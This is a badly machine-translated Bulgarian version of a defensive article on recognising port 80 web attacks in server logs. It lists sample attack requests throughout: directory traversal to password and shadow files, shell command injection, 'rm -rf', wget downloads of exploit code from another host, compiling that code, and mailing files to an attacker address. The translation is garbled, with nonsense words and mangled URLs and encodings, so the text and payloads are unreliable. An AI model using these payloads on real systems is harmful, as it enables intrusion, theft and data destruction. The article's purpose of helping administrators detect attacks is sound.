I. Резюме
II. Подробно описание на
III. Допълнителна
IV. Преливане Анализ
V. транскодиране
VI. Заключение
[Резюме]
По подразбиране порт уеб сайт 80 за услуга, тя е всичко за освобождаването на проблемите със сигурността се съхранява някои от тези уязвимости позволи на някой хакер да получават достъп до системата, дори администраторски права за влизане в сайта в рамките на, по-долу са някои от Zenomorph правилния начин 80-портов следа от удар научни изследвания, и да ти кажа как да се намерят проблеми от дневника записи.
[Детайли]
Тук отчасти чрез няколко езика Liezi на уеб сървъри и приложения и тяхната обща атака, както и неговите следи, които представляват само Liezi голяма атака, не е списък на всички форми на атака, този раздел ще Подробно описание на ролята на всяка атака, и как да използват тези уязвимости да атакува.
(1) "." ".." И "..." искане
Следи от тези атаки са много често за уеб приложения и уеб сървър, използван за позволи на някой хакер или програма червей-вируса да промени пътя на уеб сървъра, за да получат достъп до затворените зони. Повечето програми CGI с тези недостатъци, ".." заявка.
Пример:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
Това показва Нападателят Liezi искане mosd този файл, ако хакер способността пробив уеб сървър директория корен, а след това да получите повече информация и за получаване на привилегии.
(2) "20%" искане
20% е шестнадесетичен стойност, която на 16 места, въпреки че това не означава, можете да използвате нещо, но когато видите дневника ще го намерите, някои уеб приложение сървър по този характер може да се прилага ефективно Затова трябва внимателно да прегледа дневника. От друга страна, по искане понякога може да помогне да изпълняват някои команди.
Пример:
http://host/cgi-bin/lame.cgi?page=ls 20%-ал |
Това показва, Liezi хакер да изпълни команди, списък на целия каталог на исканите документи, което води до нападателя на достъп до важните файлове на вашата система, за да му помогне да се предоставя и на условията за получаване на привилегии.
(3) "% 00" искане
00% каза, че 16-байт шестнадесетичен празни, той е в състояние да безумен уеб приложение, и да поиска различни типове файлове.
Примери:
http://host/cgi-bin/lame.cgi?page=index.html
Това може да е валидно искане в машината, ако един хакер наясно с това искане е било успешно, той ще продължи да търси на CGI процедури.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Може би CGI програмата не приема това искане, тъй като е искане за проверка на файла наставка име, като например: html.shtml или други видове файлове. Повечето програми ще ви кажа исканата тип файл е невалиден, този път тя ще каже на хакер исканията на файла трябва да бъде символ на файла наставка тип, така че един хакер може да получи по пътя система, името на файла, което води до системата си по-чувствителна информация
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd% 00html
Внимание на това искане, то ще мамят CGI програма, която този документ е да се определи приемлива типове файлове, някои приложения на ефективни проверки, както е глупав искането файл, който обикновено се използва методите на хакерите.
(4) "|" искане
Това е една тръба характер, в Unix система, искане за помощ при изпълнението на няколко команди система по едно и също време.
Пример:
# Котките access_log | Впиши-и ".."
(Тази команда ще покаже влезете в ".." искане, обикновено се използват в атаки и червеи намерени)
Често, че много уеб приложения използвате този характер, това също води до фалшиви сигнали за тревога в IDS логове.
В внимателно разглеждане на молбата Ви, така че се възползват от намаляването на фалшиви сигнали за тревога в системите за откриване на проникване.
Ето някои от Lieh-Дзъ:
| Http://host/cgi-bin/lame.cgi?page=../../../../bin/ls
Това искане командване, са само някои от промените в Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls 20%-AL% 20/etc |
Това искане е в списъка на Unix система / и т.н. директория на всички файлове
http://host/cgi-bin/lame.cgi?page=cat% 20access_log |% Впиши 20-и, 20% "куци"
Котката искане команда изпълнението и прилагането на Впиши команда ще, провери на "куци"
(5) ";" искане
В Unix системи, този характер позволява на много командния ред изпълнение
Пример:
# Id; uname-а
(Въвеждане на номер команда, последвана от изпълнение на командата uname)
Някои уеб програма с този характер, може да доведе до вашия IDS логове предупреждение за повреда, трябва внимателно да проверите вашата програма в Мрежата, така че да се намали рискът от провал на сигналите IDS.
(6) " " и " " Искане
Трябва да проверите трупи записва два символа, поради редица причини, първата от тях е знак, че добавената данни в документа
Пример 1:
# Echo "си hax0red H0 H0" / и т.н. / MOTD (MOTD поиска писмена информация в този документ)
Един хакер може лесно да използвате възможностите на искането, както по-горе подправяне на вашата уеб страница. Като известните RDS използват хакерите често се използва за промяна на уеб страница.
Пример 2:
http://host/something.php=Hi% 20mom% 20Im% 20Bold!
Html ще забележите, че на езика на знаците тук, той също изразходвани " "," " символи, подобни атаки не могат да причинят нападателя за достъп до системата, объркани хора, че това е законна информация за уеб сайт (което води до Хората посетете този линк за посещение на хакерите да зададете адрес, това искане може да бъде кодирана в 16 шестнадесетичен символ във формата, така че следи от атаката не е толкова очевидна)
(7) "!" Искане
Общ език по този характер СС молба (Server Side Включва) Аз атака, ако хакер е хакер обърка потребителят кликне върху линка набор, и също както по-горе.
Пример:
http://host1/something.php =
В Lieh-Дзъ е хакер може да го направи във файл на сайта host2 от host1 изглежда по-горе (разбира се, изисква посетителите да посетят връзка Нападателят на настройки. Това искане може да се преобразува в 16 шестнадесетичен кодиране маска, не е лесно намерена)
В същото време, този подход може да изпълни командата сайт власт
Пример:
http://host/something.php =
В Lieh план на системата за дистанционно "ID" команда, тя ще покаже ID на потребителя уеб сайт, обикновено е "никой" или "WWW"
Тази форма позволява включването скрити файлове.
Пример:
http://host/something.php =
В скритите файлове. Htpasswd няма да бъде показан, Apache ще откаже да установи такива правила, за да. Ht формата искането, и SSI лого ще байпас такива ограничения, и да доведе до проблеми със сигурността
(8) "," Искане
Тези атаки се използва за опит за дистанционно вмъкнете PHP уеб процедурите за кандидатстване, може да позволи за изпълнение на поръчки, в зависимост от настройките на сървъра, както и други фактори на работното място (като например PHP е настроен на безопасен режим)
Пример: http://host/something.php = passthru ("ID ");?
В някои просто приложение на PHP, може да е на уеб сайта на дистанционното система на права на потребителя да изпълнява местните команда
(9) "" "заявка
Този знак по-късно се използва за изпълнение на командите в Perl, героите в уеб приложението не е често използван, така че ако го видя в дневника, трябва да бъдат много внимателни
Пример:
http://host/something.cgi = "ID"
Напиши Perl CGI въпросната програма ще доведе до изпълнение на команда номер
[Допълнителна]
В следващия раздел ще обсъдят още на нападателя може да изпълнява командите, както и исканите документи, и ако имате отдалечено изпълнение на команди дефекти, трябва да бъде как да се провери го намери. Тази част е само за да ви дам една добра идея, и казвам ви система, което се случва, атакуващите се опитват да атакуват вашия система следи, но не списък на всички хакери да използват команди и искания.
"/ BIN / НС"
Тази команда изисква от целия път, в много уеб приложения имат тази вратичка, ако влезете в много места на такова искане, е възможно за големи отдалечени на уязвимостта изпълнение команда, но не е задължително да е проблем също може да бъде фалшива тревога. За пореден път припомни, уеб писмена молба (CGI, ASP, PHP ... и т.н.) е в основата на сигурността
Пример:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls 20%-ал |
http://host/cgi-bin/bad.cgi?doh=ls 20%-AL;
"Cmd.exe"
Това е един прозорец на черупката, ако един хакер да имат достъп и да изпълня този скрипт в настройките на сървъра при условията, разрешени в Windows машина може да направи нищо, много червеи е чрез порт 80, комуникацията с отдалечената машина
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ BIN / ID"
Това е два бинарни файлове, това е проблем и / хамбар / НС, като, ако влезете в много места на такова искане, е възможно за големи отдалечени на уязвимостта команда изпълнение, но не е задължително да е проблем също може да бъде фалшива тревога.
Тя ще покаже коя част принадлежи към кой потребител и група
Пример:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ BIN / РМ"
Тази команда можете да изтриете файлове, без да използват правилно е много опасно
Примери:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm 20%-RF 20% * |
http://host/cgi-bin/bad.cgi?doh=rm 20%-RF 20% *;
"Wget и TFTP" команда
Тези команди са често хакери могат да получат допълнителни привилегии за изтегляне на файлове, wget е командата под може да се използва за изтегляне на задни врати, TFTP е под командването Unix и NT, се използва за изтегляне на файла. Някои IIS червея се разпространява чрез TFTP за копиране на вируса на други хостове
Примери:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget% 20http: / / host2/Phantasmp.c | http:// домакин / CGI-BIN / bad.cgi? DOH = wget% 20http: / / www.hwa-security.net/Phantasmp.c;
"Котките" команда
Тази команда се използва, за да видите съдържанието на файла, използван за четене на важна информация, като например конфигурационни файлове, парола файлове, кредитни досиета и документи, можеш да се сетиш
Примери: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat% 20/etc/motd | http://host/cgi-bin/ bad.cgi? DOH = котка% 20/etc/motd;
"Ехо" команда
Тази команда се използва за писане на данни до преписката, като "index.html"
Примери: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "FC-# киви% 20was% 20here" 20% % | 200day.txt http://host/cgi-bin/bad.cgi?doh=echo% 20 "FC-# киви% 20was% 20here" 20% 200day.txt%;
"Ps" команда
Изброява в момента текат процеси, кажете на нападателя, че отдалечения хост работи на софтуера, за да се получи някаква представа за проблемите на сигурността, да се получи допълнителна разрешения
Примери: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps 20%-AUX | http://host/cgi-bin/bad. CGI? DOH = PS 20%-AUX;
"Убий и killall" команда
Unix системи, за да убие този процес, един хакер може да използва тази команда за спиране на системни услуги и процеси, може да заличи следите на нападателите, някои използват ще произвеждат много деца процеси
Примери: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200 | http://host/cgi-bin/bad.cgi?doh=kill 20% -9% 200;
"Uname" команда
Тази команда казва Нападателят на отдалечена машина име, от известно време, чрез този уеб сайт, за да разберете кой Интернет доставчик, един хакер, който може да бъде посетен днес. Uname-а да искат обикновено, те ще бъдат записани в регистрационния файл
Примери: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname 20%-а | http://host/cgi-bin/bad. CGI? DOH = uname% 20-А;
"Як, ССЗ, Perl, Python, и т.н. ..." компилация / тълкуване на командата
Нападам чрез wget или TFTP изтегляне използване, както и използването на CC, GCC компилатор за събиране на тази в изпълнима програма, както и привилегии за достъп
Примери: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. CGI? DOH = ССЗ% 20Phantasmp.c;. / a.out 20%-P% 2031337;
Ако видите трупа открити в "Perl" Пайтън "Тези указания могат да бъдат отдалечен хакер да изтегля Perl, Python скрипт, и се опита да получи правата на местното
"Поща" команда
Нападателят често използват тази команда система, някои важни документи в моя пощенската кутия на хакери, но и склонни към електронната поща бомбени нападения са извършени
Примери: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail% 20attacker@fuckcnhonker.org 20%
2.168.22.1;
"Чоун, коригирате, chgrp, chsh и т.н. ..." и други команди
Unix системи, за да им позволи да промените файла за достъп
Чоун = позволява определянето на собственика на файл коригира = позволява да зададете файл разрешения chgrp = позволява на собственика да променя групата разрешения за файлове chsh = право да променя обвивката на потребителя
Примери: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20 777% 20index.html | http://host/cgi-bin/ bad.cgi? DOH = коригира% 20777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown%% 20zeno 20 / и т.н. / master.passwd |% http://host/cgi-bin/bad.cgi?doh=chsh 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / хамбар / chgrp% 20nobody |% 20/etc/shadow
"/ И т.н. / passwd" файл
Това е файла с паролите на системата, обикновено на разстояние от сянка, и не позволява да видите криптирана парола, но за един хакер, който може да знае какво е валиден потребител, и абсолютна пътека на системата, името на сайта и друга информация, както е обикновено от сянката на разстояние, така че хакерите обикновено виждам / и т.н. / файл сянка
"/ И т.н. / master.passwd"
Този файл е файлът BSD система с парола, съдържа криптирана парола, преписката по главната сметка е само само за четене, а някои неквалифицирани нападателите отвори опит да се запознае със съдържанието вътре. Ако на сайта е корен привилегии да тече, след това нападателите се, ние можем да се запознае със съдържанието вътре, много от проблемите на системния администратор ще идват една след друга
"/ И т.н. / сянка"
Съдържа парола криптирана система, четем също на главната сметка и / ЕТ / master.passwd почти
"/ И т.н. / MOTD"
Когато потребителите се логнете в Unix система, информация се появява в "Съобщение на деня" файл, той осигурява важна информационна система и администратор на потребителите на някои определения, потребителите, които искат да видят тези, които не са съдържа и информация на версията на системата, нападателите обикновено видите този файл, да се разбере каква е системата работи на нападателя, следващата стъпка е да потърсите такъв вид система, използва и допълнителен достъп до системата за привилегии
"/ И т.н. / е домакин"
Документът предвижда IP адрес и информационна мрежа, атакуващият може да научите повече за системата за мрежови настройки
"/ ЮЕсАр / местни / Apache / Conf / httpd.conf"
Това е уеб Apache файлов сървър конфигурация, атакуващият може да разбере, като CGI, SSI и друга информация е достъпна
"/ И т.н. / inetd.conf"
Това е конфигурационен файл inetd услуги, атакуващият може да научите на отдалечена машина, започнете тези услуги, независимо дали за използване на опаковки за контрол на достъпа, ако обвивка беше установено, бягане, един хакер следващата стъпка ще проверява "/ и т.н. / hosts.allow" и "/ и т.н. / hosts.deny", файл, и които могат да се променят някои настройки, достъп привилегии
". Htpasswd,. Htaccess и. Htgroup"
Тези файлове обикновено се използват в уеб сайта удостоверяване потребител, атакуващият може да видите тези файлове и да получи потребителско име и парола на файла с паролите. Htpasswd Pi криптирана чрез редица Jiandan рана Chengxu да заклеймява, да позволи достъп нападателите сайт Zhong защитени зони (обикновено на потребителя с едно и също потребителско име и парола, атакуващият може дори да посетите други сметка)
"Access_log и error_log"
Това са файлове Apache сървъри, хакерите често видите тези файлове, погледнете тези искания са записани тези и други искания за различни места
Обикновено нападателите ще променя тези лог файлове, като негов адрес информация, хакерите през порт 80 чрез системата ви и резервната система също не работи, няма друга програма за запис статут записваща система, която би за откриване на проникване става много трудно да се работи
"[Drive-писмо]: winntrepairsam._ или [карам-писмо]: winntrepairsam"
Windows NT файлова система парола, ако дистанционно командване не може да се осъществи, нападателят ще обикновено изискват тези документи, след това "l0pht пляскане" от типа на парола крекинг инструменти за пляскане, ако нападателя се опитва да атакува файла с паролите администратора, ако успешна тогава отдалечената машина ще бъде хакер получава контрол
[Overflow анализ]
В тази статия няма да кажа твърде много за преливане на темата, аз ще раздаде какви са тези явления и следи от забележителни и са от особена важност, за буферна често атакувани от хакери преобразуване код и трудно да се намерят други начини за постигане на
Тук е просто лъжа Zi
Пример: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
Това Liezi показва Нападателят на заявка за изпращане на партида на герой, да тествате програмата, препълване буфер, препълване буфер може да получи отдалечени разрешения команда домакин изпълнение, ако собственикът има setuid и процедури за корен, чрез преливане, могат да получат достъп до цялата система, ако не като setuid програма, тогава преливане да е само чрез провеждане на уеб сайта на правата на потребителите
Тук не мога да кажа на всички тези обстоятелства, но трябва редовно да проверяват файла регистър, ако този ден изведнъж много искания, но обикновено не повече от искането, това означава, че са подложени на преливане атаки, разбира се, може да бъде Нова атака на мрежата червей
[Транскодиране]
Всички атаки споменати по-горе искане Нападателят обикновено знае IDS системи, често механично проверите искане, обикновено нападателя ще използват данните инструмент за преобразуване на съдържанието в исканата формат в 16 шестнадесетичен, което води IDS ще игнорира тези искания, Ние сме запознати с уязвимост CGI сканиране инструмент, който е добър Liezi мустак. Ако видите дневника на време, че много от 16 шестнадесетичен и някои знаци, които не са общи, а след това на нападателя може да се опитате да използвате някои от начините да атакуват системата ви
Бърз начин е вашият лог файл на искането за тези шестнадесетичен 16, го копирате в браузъра си чрез браузъра могат да бъдат превърнати в правото искането, и показва съдържанието на искането, ако не кураж да поемете този риск, обикновен човек ASCII, може да ви даде правилния код.
[Заключение]
Тази статия не може да обхване всички 80 пристанища на нападението, но повечето са били цитирани повече от общия атака, и да ти кажа как да се провери лог файлове, както и как да добавите като броят на правилата IDS, напишете я Целта е да се Мрежата системен администратор, трябва да се притесняват за това, което е добра идея в същото време, надявам се тази статия помага за уеб разработчици уеб програмата да напише по-добре програми
НА ЗАБЕЛЕЖКА: Ако имате някакви коментари и предложения, моля пишете на имейл admin@cgisecurity.com.